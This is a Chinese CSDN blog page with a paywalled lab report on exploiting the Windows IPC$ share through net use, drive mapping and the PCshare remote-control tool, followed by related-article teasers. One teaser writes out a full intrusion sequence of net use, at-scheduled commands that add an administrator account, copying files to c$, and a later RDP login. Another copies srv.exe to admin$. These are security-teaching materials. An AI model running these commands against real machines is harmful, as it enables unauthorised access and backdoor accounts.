信息安全 漏洞利用

最新推荐文章于 2024-05-10 21:19:35 发布
最新推荐文章于 2024-05-10 21:19:35 发布
阅读量567 收藏
点赞数
分类专栏: 实验报告 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yidao0819/article/details/124913401
版权
该实验详细介绍了如何利用IPC$漏洞进行远程控制。首先,确认目标IPC$共享打开,然后通过net use命令建立连接,映射目标C盘为本地Z盘。接着,使用PCshare工具生成并上传远程控制程序,尝试获取远程主机的Shell、用户列表等信息。最后,从远程主机角度探讨防御策略,尽管未能按预定时间上线,但整个过程展示了IPC$漏洞的利用流程。
摘要由CSDN通过智能技术生成

实验目的

1、了解IPC$漏洞原理

2、掌握几个相关net 命令的用法

3、掌握PCshare生成远程控制程序工具的使用

  • 实验原理

实验参考步骤:

1、确认目标的IPC$默认共享已经打开。

2、在本地利用net use与远程目标建立IPC$连接通道、

3、将目标的C盘映射为本地Z盘。

(至此,说明已成功入侵并控制对方C盘,继续进行可更方便地实现全方位的远程控制)

4、利用PCshare工具实现远程控制。

5、尝试获得远程主机的 Shell、用户列表、开启的服务列表、开放的端口列表等

6、站在远程主机角度,尝试进行防御,破坏远程控制。

最低0.47元/天 解锁文章
????dark
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验记录一之SQL注入
qq_54580973的博客
05-07 279
这只是我一次实验过程的记录!!!! DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 安装部署phpStudy+DVWA漏洞演练平台 安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成
ipc$漏洞利用实例
dieman0446的博客
07-26 1359
一、什么是IPC$ IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道, 通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换, 从而实现对远程计算机的访问。 二、如何发现系统是否存在该漏洞 本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现I...
IPC$漏洞利用简介
YUKIDDDD的博客
08-02 3073
IPC$漏洞利用简介1.关于Windows操作系统中的“共享”2. 利用条件3.IPC连接建立与攻击尝试5.常用命令 1.关于Windows操作系统中的“共享” 在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享, 普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等; 默认共享:Windows操作系统的隐含驱动器共享,通常有: (1)驱动器共享:如C$、D$,开启后可直接访问分区中资源; (2)系统管理共享admin$:通常指向C:\Windows。
2002-2006年系统经典利用漏洞ipc$
01-22
2002-2006年系统经典利用漏洞ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
漏洞利用原理(高级)
wk19951125的博客
08-16 371
Windows安全机制概述参考文献 windows提供的浅层安全机制: 增加Windows安全中心 添加PC段防火墙 未经用户允许,大多数Web弹窗和Activex控件安装均被禁止 Internet Explorer 7增加了筛选防冒网站功能 添加UAC(用户账户控制)机制 集成Windows Defender Windows提供的深层保护: 使用GS编译技术,在函数返回地址之前加入Secu...
漏洞利用与防护.docx
12-03
DVWA漏洞环境搭建、SQL注入平台搭建、xxs测试平台搭建
信息安全技术:目录遍历漏洞利用.pptx
11-01
信息安全技术:目录遍历漏洞利用》 在信息安全领域,目录遍历漏洞是一种常见的安全问题,它涉及到Web应用和Web服务器的安全性。攻击者利用这种漏洞可以访问到本不应公开的系统文件,甚至可能控制服务器执行恶意...
信息安全技术:MySQL数据库漏洞利用.doc
11-01
信息安全技术基础
信息安全技术 安全漏洞等级划分指南》.doc
03-24
信息安全技术 安全漏洞等级划分指南 《信息安全技术 安全漏洞等级划分指南》是中华人民共和国国家标准GB/T XXXXX—XXXX,发布于XXXX年XX月XX日,实施于XXXX年XX月XX日。该标准旨在提供一份统一的安全漏洞等级划分...
信息安全技术基础:利用Nginx漏洞上传.pptx
11-01
信息安全技术基础:利用Nginx漏洞上传.pptx】这篇文档主要讲解了信息安全领域中的一个常见问题,即如何利用Nginx服务器的解析漏洞进行非法文件上传。Nginx是一个广泛使用的高性能HTTP服务器和反向代理服务器,以其...
Ipc漏洞简单攻击.
03-14
Ipc漏洞简单攻击.这是网络工具中很好的一个哦
(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
F4ckM3的专栏
08-18 3888
实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络实验时数(学分):2学时实验类别:实践实验类 实验目的   1.了解IPC$漏洞原理;   2.掌握IPC$漏洞攻击方法;   3.掌握psExec工具的使用;   4.掌握远程控制工具radmin的使用。 预备知识 本实验要求实验者具备如下的相关知识。     
从编程角度来看IPC$空连接的利用和防范
修养生息,以得佳境
04-22 2680
  前言  我们知道,一般的攻击行为的首要步骤是收集目标的系统信息,对于NT/2K/XP系统而言,最简单的收集方法就是利用IPC$空连接。本文从原理入手介绍IPC$,并从编程的角度来看如何利用它,最后介绍一些简单的防范。本文要求读者有一定编程和C的基础,对网络知识有所了解。 我会收集一些常用的IPC$
2021-10-28 漏洞利用与远程控制
夕阳的街道的博客
10-28 784
一、实验题目: 漏洞利用与远程控制 二、实验内容: 1.使用nmap的【-A】参数对metasploitable进行强力扫描 2.使用kali自带的msfconsole进行渗透测试与远程控制 三、环境准备: 1.kali虚拟机(攻击者主机:192.168.112.130) 2.Metasploitable靶机(目标主机:192.168.112.132) 四、实验步骤: 1.使用pin...
使用Metasploit进行ms12-020蓝屏攻击
A_dmin的博客
09-12 2626
使用Metasploit进行ms12-020蓝屏攻击 实验概述   Ms12-020是Microsoft远程桌面协议RDP远程代码执行漏洞,本实验是通过利用meterpreter进行攻击。   远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑...
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 6821
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
ipc$漏洞攻击(实验)
最新发布
2301_76361674的博客
05-10 2062
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。5.然后,我们物理连接到靶机上,到了两分钟后,我们可以用命令看到,这个pp45的用户就出现了。
操作系统IPC漏洞研究
weixin_34008784的博客
11-14 305
在学校申请做了个项目。一切都差不多准备好了,等待结题之中。这种三流学校就是差劲,做事没有规程,没有效率。到后来实在没有规章制度就自己随便搞个来限制你。虽然学校差劲,但是在做这个项目的时候还是学到了很多东西。最起码,发表了一篇论文,虽然写的不是很深奥的东西,但是自己对这个研究还是蛮满意的。今日就把论文给挂上面,来显摆显摆: 操作系统IPC漏洞分析与防范 朱宁武,张 宇...
故障监视与安全漏洞利用技术解析
这些内容提供了对安全漏洞利用的全面理解,包括在不同平台上如何利用各种类型的安全漏洞,如栈溢出、格式化串漏洞和堆溢出,以及如何编写和利用shellcode来控制目标系统。对于任何想要深入了解安全攻防的IT专业人员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值